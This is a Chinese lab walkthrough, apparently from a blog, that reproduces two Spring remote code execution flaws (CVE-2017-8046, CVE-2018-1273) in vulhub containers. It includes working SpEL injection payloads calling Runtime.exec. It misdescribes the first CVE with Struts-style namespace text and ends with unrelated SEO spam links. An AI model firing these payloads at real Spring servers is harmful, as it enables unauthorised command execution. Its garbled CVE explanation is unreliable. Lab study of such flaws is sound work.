当前位置: 首页 > wzjs >正文

江门网站制作设计域名注册官网

江门网站制作设计,域名注册官网,什么是营销型手机网站建设,网站建设标书模版一、CVE-2017-8046-Spring Data Rest 远程命令执行命令 漏洞环境 vulhub靶场 /spring/CVE-2017-8046 漏洞简介 漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞…

一、CVE-2017-8046-Spring Data Rest 远程命令执行命令

漏洞环境

vulhub靶场 /spring/CVE-2017-8046

漏洞简介

漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞的发⽣。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使⽤通配符namespace,从⽽导致远程代码执⾏漏洞的发⽣。

第一步:开启靶场,访问漏洞页面

#URL
http://47.103.81.25:8080/customers/1
第二步:在本页面抓包,构造payload

#请求方式
先右键修改请求方式改为POST,再直接将POST改为PATCH#Content-Typ
application/json-patch+json#发送数据
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,101}))/lastname", "value": "vulhub" }]#数据中
new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115} 表示的命令 touch /tmp/success ⾥⾯的数字是ascii码
第三步:在云服务器进入此靶场容器的终端

#命令docker ps查看容器id
77e610fd0066#进入终端
docker exec -it 77e610fd0066 /bin/bash
第四步:打开bp,发送后,返回云服务器切换到/tmp目录,查看文件,成功上传

二、CVE-2018-1273-Spring代码执行漏洞

漏洞简介

Spring Data 是⼀个⽤于简化数据库访问,并⽀持云服务的开源框架,Spring Data Commons 是 Spring Data下所有⼦项⽬共享的基础框架。Spring Data Commons 在 2.0.5 及以前版本中,存在⼀处 SpEL 表达式注⼊漏洞,攻击者可以注⼊恶意 SpEL 表达式以执⾏任意命令。

第一步:访问靶场地址
#URL
http://47.103.81.25:8080/users
第二步:填写注册信息,bp抓包,发送到重放器

第三步:删除提交的内容,构造payload

#构造payload
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/iyu")]=&password=&repeatedPassword=
第四步:在云服务器进入此靶场容器的终端,查看是否成功上传文件

#命令docker ps查看容器id
769e92400e15#进入终端
docker exec -it 769e92400e15 /bin/bash#查看是否成功上传
ls /tmp

                                                                                                                                FROM  IYU_

http://www.dtcms.com/wzjs/139839.html

相关文章:

  • 怎么用群晖nas做网站西安做推广优化的公司
  • 公司做网站费用seo关键词推广案例
  • 大连网络营销咨询服务seo确定关键词
  • 动态网站建设试题软文素材网
  • 郑州手机网站开发营销型企业网站案例
  • 汕头 网站建设搜狗推广助手
  • 网站模板 wordpress带会员系统青岛网站设计制作
  • 深圳web网站开发公司大型网站建设公司
  • 网站通知发送邮件seo实战
  • 网站名称是什么seodao cn
  • 上饶网站建设兼职关键词长尾词优化
  • 网站开发预算成本价宁波seo排名优化培训
  • 做网站开发钱公司网页制作需要多少钱
  • 廊坊网站关键词排名线上销售水果营销方案
  • 做网站目录网络推广平台网站推广
  • 临沂做网站公司西安seo服务公司排名
  • 做优化的网站电话如何查看百度搜索指数
  • 定制柜设计网站网络营销考试答案
  • 茂名做网站的公司学生没钱怎么开网店
  • 医院设计网站建设宁波seo整站优化软件
  • 开发公司申请办理公共维修资金申请书站长工具seo综合查询下载
  • 中国做网站公司排名全国今日新增疫情
  • 宁波室内设计公司排名湖南seo服务
  • 汽配出口做哪个网站好网站推广具体内容
  • 公司的网站建设价格低服务营销的概念
  • 政务公开既网站信息化建设会议关键词优化软件
  • 怎么创建自己的小程序商城如何点击优化神马关键词排名
  • 如何取一个大气的名字的做网站行业关键词词库
  • wordpress 采集 发布孔宇seo
  • 做的网站浏览器提示不安全问题营销咨询公司排名